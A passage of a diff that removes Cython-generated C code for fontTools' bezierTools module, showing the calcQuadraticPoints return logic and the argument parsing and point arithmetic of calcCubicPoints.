__Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Add(__pyx_t_2, __pyx_v_cx); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 989, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_x3 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":990 - * y2 = (by * 0.5) + cy - * x3 = ax + bx + cx - * y3 = ay + by + cy # <<<<<<<<<<<<<< - * return (x1, y1), (x2, y2), (x3, y3) - * - */ - __pyx_t_1 = PyNumber_Add(__pyx_v_ay, __pyx_v_by); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 990, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Add(__pyx_t_1, __pyx_v_cy); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 990, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_v_y3 = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":991 - * x3 = ax + bx + cx - * y3 = ay + by + cy - * return (x1, y1), (x2, y2), (x3, y3) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_2 = PyTuple_New(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 991, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_v_x1); - __Pyx_GIVEREF(__pyx_v_x1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_v_x1)) __PYX_ERR(0, 991, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_y1); - __Pyx_GIVEREF(__pyx_v_y1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_v_y1)) __PYX_ERR(0, 991, __pyx_L1_error); - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 991, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_x2); - __Pyx_GIVEREF(__pyx_v_x2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_x2)) __PYX_ERR(0, 991, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_y2); - __Pyx_GIVEREF(__pyx_v_y2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_y2)) __PYX_ERR(0, 991, __pyx_L1_error); - __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 991, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_INCREF(__pyx_v_x3); - __Pyx_GIVEREF(__pyx_v_x3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_x3)) __PYX_ERR(0, 991, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_y3); - __Pyx_GIVEREF(__pyx_v_y3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_v_y3)) __PYX_ERR(0, 991, __pyx_L1_error); - __pyx_t_5 = PyTuple_New(3); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 991, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_t_2)) __PYX_ERR(0, 991, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_t_1)) __PYX_ERR(0, 991, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 2, __pyx_t_3)) __PYX_ERR(0, 991, __pyx_L1_error); - __pyx_t_2 = 0; - __pyx_t_1 = 0; - __pyx_t_3 = 0; - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":981 - * - * - * def calcQuadraticPoints(a, b, c): # <<<<<<<<<<<<<< - * ax, ay = a - * bx, by = b - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcQuadraticPoints", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_ax); - __Pyx_XDECREF(__pyx_v_ay); - __Pyx_XDECREF(__pyx_v_bx); - __Pyx_XDECREF(__pyx_v_by); - __Pyx_XDECREF(__pyx_v_cx); - __Pyx_XDECREF(__pyx_v_cy); - __Pyx_XDECREF(__pyx_v_x1); - __Pyx_XDECREF(__pyx_v_y1); - __Pyx_XDECREF(__pyx_v_x2); - __Pyx_XDECREF(__pyx_v_y2); - __Pyx_XDECREF(__pyx_v_x3); - __Pyx_XDECREF(__pyx_v_y3); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":994 - * - * - * def calcCubicPoints(a, b, c, d): # <<<<<<<<<<<<<< - * ax, ay = a - * bx, by = b - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_57calcCubicPoints(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_56calcCubicPoints, "calcCubicPoints(a, b, c, d)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_57calcCubicPoints = {"calcCubicPoints", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_57calcCubicPoints, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_56calcCubicPoints}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_57calcCubicPoints(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_a = 0; - PyObject *__pyx_v_b = 0; - PyObject *__pyx_v_c = 0; - PyObject *__pyx_v_d = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[4] = {0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("calcCubicPoints (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_a,&__pyx_n_s_b,&__pyx_n_s_c,&__pyx_n_s_d,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_a)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 994, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_b)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 994, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcCubicPoints", 1, 4, 4, 1); __PYX_ERR(0, 994, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_c)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 994, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcCubicPoints", 1, 4, 4, 2); __PYX_ERR(0, 994, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_d)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 994, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcCubicPoints", 1, 4, 4, 3); __PYX_ERR(0, 994, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "calcCubicPoints") < 0)) __PYX_ERR(0, 994, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 4)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - } - __pyx_v_a = values[0]; - __pyx_v_b = values[1]; - __pyx_v_c = values[2]; - __pyx_v_d = values[3]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("calcCubicPoints", 1, 4, 4, __pyx_nargs); __PYX_ERR(0, 994, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcCubicPoints", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_56calcCubicPoints(__pyx_self, __pyx_v_a, __pyx_v_b, __pyx_v_c, __pyx_v_d); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_56calcCubicPoints(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c, PyObject *__pyx_v_d) { - PyObject *__pyx_v_ax = NULL; - PyObject *__pyx_v_ay = NULL; - PyObject *__pyx_v_bx = NULL; - PyObject *__pyx_v_by = NULL; - PyObject *__pyx_v_cx = NULL; - PyObject *__pyx_v_cy = NULL; - PyObject *__pyx_v_dx = NULL; - PyObject *__pyx_v_dy = NULL; - PyObject *__pyx_v_x1 = NULL; - PyObject *__pyx_v_y1 = NULL; - PyObject *__pyx_v_x2 = NULL; - PyObject *__pyx_v_y2 = NULL; - PyObject *__pyx_v_x3 = NULL; - PyObject *__pyx_v_y3 = NULL; - PyObject *__pyx_v_x4 = NULL; - PyObject *__pyx_v_y4 = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *(*__pyx_t_4)(PyObject *); - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("calcCubicPoints", 1); - - /* "fontTools/misc/bezierTools.py":995 - * - * def calcCubicPoints(a, b, c, d): - * ax, ay = a # <<<<<<<<<<<<<< - * bx, by = b - * cx, cy = c - */ - if ((likely(PyTuple_CheckExact(__pyx_v_a))) || (PyList_CheckExact(__pyx_v_a))) { - PyObject* sequence = __pyx_v_a; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 995, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 995, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 995, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_a); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 995, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 995, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L4_unpacking_done; - __pyx_L3_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 995, __pyx_L1_error) - __pyx_L4_unpacking_done:; - } - __pyx_v_ax = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_ay = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":996 - * def calcCubicPoints(a, b, c, d): - * ax, ay = a - * bx, by = b # <<<<<<<<<<<<<< - * cx, cy = c - * dx, dy = d - */ - if ((likely(PyTuple_CheckExact(__pyx_v_b))) || (PyList_CheckExact(__pyx_v_b))) { - PyObject* sequence = __pyx_v_b; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 996, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 996, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 996, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_b); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 996, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 996, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L6_unpacking_done; - __pyx_L5_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 996, __pyx_L1_error) - __pyx_L6_unpacking_done:; - } - __pyx_v_bx = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_by = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":997 - * ax, ay = a - * bx, by = b - * cx, cy = c # <<<<<<<<<<<<<< - * dx, dy = d - * x1 = dx - */ - if ((likely(PyTuple_CheckExact(__pyx_v_c))) || (PyList_CheckExact(__pyx_v_c))) { - PyObject* sequence = __pyx_v_c; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 997, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 997, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 997, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_c); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 997, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 997, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L8_unpacking_done; - __pyx_L7_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 997, __pyx_L1_error) - __pyx_L8_unpacking_done:; - } - __pyx_v_cx = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_cy = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":998 - * bx, by = b - * cx, cy = c - * dx, dy = d # <<<<<<<<<<<<<< - * x1 = dx - * y1 = dy - */ - if ((likely(PyTuple_CheckExact(__pyx_v_d))) || (PyList_CheckExact(__pyx_v_d))) { - PyObject* sequence = __pyx_v_d; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 998, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 998, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 998, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_d); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 998, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L9_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L9_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 998, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L10_unpacking_done; - __pyx_L9_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 998, __pyx_L1_error) - __pyx_L10_unpacking_done:; - } - __pyx_v_dx = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_dy = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":999 - * cx, cy = c - * dx, dy = d - * x1 = dx # <<<<<<<<<<<<<< - * y1 = dy - * x2 = (cx / 3.0) + dx - */ - __Pyx_INCREF(__pyx_v_dx); - __pyx_v_x1 = __pyx_v_dx; - - /* "fontTools/misc/bezierTools.py":1000 - * dx, dy = d - * x1 = dx - * y1 = dy # <<<<<<<<<<<<<< - * x2 = (cx / 3.0) + dx - * y2 = (cy / 3.0) + dy - */ - __Pyx_INCREF(__pyx_v_dy); - __pyx_v_y1 = __pyx_v_dy; - - /* "fontTools/misc/bezierTools.py":1001 - * x1 = dx - * y1 = dy - * x2 = (cx / 3.0) + dx # <<<<<<<<<<<<<< - * y2 = (cy / 3.0) + dy - * x3 = (bx + cx) / 3.0 + x2 - */ - __pyx_t_1 = __Pyx_PyFloat_TrueDivideObjC(__pyx_v_cx, __pyx_float_3_0, 3.0, 0, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1001, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Add(__pyx_t_1, __pyx_v_dx); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1001, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_v_x2 = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1002 - * y1 = dy - * x2 = (cx / 3.0) + dx - * y2 = (cy / 3.0) + dy # <<<<<<<<<<<<<< - * x3 = (bx + cx) / 3.0 + x2 - * y3 = (by + cy) / 3.0 + y2 - */ - __pyx_t_2 = __Pyx_PyFloat_TrueDivideObjC(__pyx_v_cy, __pyx_float_3_0, 3.0, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1002, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Add(__pyx_t_2, __pyx_v_dy); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1002, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_y2 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1003 - * x2 = (cx / 3.0) + dx - * y2 = (cy / 3.0) + dy - * x3 = (bx + cx) / 3.0 + x2 # <<<<<<<<<<<<<< - * y3 = (by + cy) / 3.0 + y2 - * x4 = ax + dx + cx + bx - */ - __pyx_t_1 = PyNumber_Add(__pyx_v_bx, __pyx_v_cx); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1003, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_PyFloat_TrueDivideObjC(__pyx_t_1, __pyx_float_3_0, 3.0, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1003, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Add(__pyx_t_2, __pyx_v_x2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1003, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_x3 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1004 - * y2 = (cy / 3.0) + dy - * x3 = (bx + cx) / 3.0 + x2 - * y3 = (by + cy) / 3.0 + y2 # <<<<<<<<<<<<<< - * x4 = ax + dx + cx + bx - * y4 = ay + dy + cy + by - */ - __pyx_t_1 = PyNumber_Add(__pyx_v_by, __pyx_v_cy); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1004, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_PyFloat_TrueDivideObjC(__pyx_t_1, __pyx_float_3_0, 3.0, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1004, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Add(__pyx_t_2, __pyx_v_y2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1004, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_y3 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1005 - * x3 = (bx + cx) / 3.0 + x2 - * y3 = (by + cy) / 3.0 + y2 - * x4 = ax + dx + cx + bx # <<<<<<<<<<<<<< - * y4 = ay + dy + cy + by - * return (x1, y1), (x2, y2), (x3, y3), (x4, y4) - 